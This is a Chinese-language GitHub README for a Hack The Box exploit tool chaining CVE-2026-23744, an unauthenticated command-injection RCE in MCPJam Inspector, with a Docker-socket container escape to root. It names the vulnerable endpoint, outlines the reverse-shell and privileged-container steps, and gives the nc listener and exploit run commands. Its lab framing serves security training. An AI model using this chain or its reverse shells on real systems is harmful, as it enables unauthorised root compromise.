d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX
GitHub: d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX
针对 MCPJam Inspector RCE 漏洞的完整利用链工具,实现从远程代码执行到 Docker 逃逸提权的全自动化攻击。
Stars: 0 | Forks: 0
# CVE-2026-23744 - Kobold Exploit
针对 Kobold HTB 机器的完整链利用。利用 MCPJam Inspector RCE (CVE-2026-23744) 并通过 Docker socket 滥用提权至 root。
## CVE-2026-23744
MCPJam Inspector <= 1.4.2 默认监听 `0.0.0.0`。`/api/mcp/connect` 端点将 `command` 和 `args` 直接传递给 shell 执行,未进行过滤,从而允许未经身份验证的 RCE。
## 该漏洞利用的功能
1. 向 `/api/mcp/connect` 发送包含反向 shell payload 的恶意 POST 请求
2. 使用 `sg docker` 切换到 docker 组(gshadow 中无密码)
3. 运行一个挂载主机文件系统的特权容器
4. Chroot 进入主机并发送一个 root 反向 shell
## 使用方法
```
# 终端 1 - 监听器
nc -lvnp 4444
# 终端 2 - exploit
python3 exploit.py mcp.kobold.htb --lhost YOUR_IP --lport 4444
```
## 选项
| 标志 | 描述 | 默认值 |
|------|-------------|---------|
| `target` | 目标主机 | 必填 |
| `--lhost` | 你的 IP | 必填 |
| `--lport` | 你的端口 | 必填 |
| `-p` | 目标端口 | 443 |
| `-s` | 协议 (http/https) | https |
| `-e` | 端点路径 | /api/mcp/connect |
| `-t` | 超时时间 | 10 |
| `-v` | 详细输出 | off |
## 环境要求
```
pip install requests
```
标签:CISA项目, Cutter, CVE-2026-23744, Docker Socket, Exploit-Dev, HTB, Kobold, MCPJam Inspector, OPA, PoC, Python, RCE, Writeup, 协议分析, 命令注入, 容器逃逸, 无后门, 暴力破解, 未授权访问, 权限提升, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护, 靶场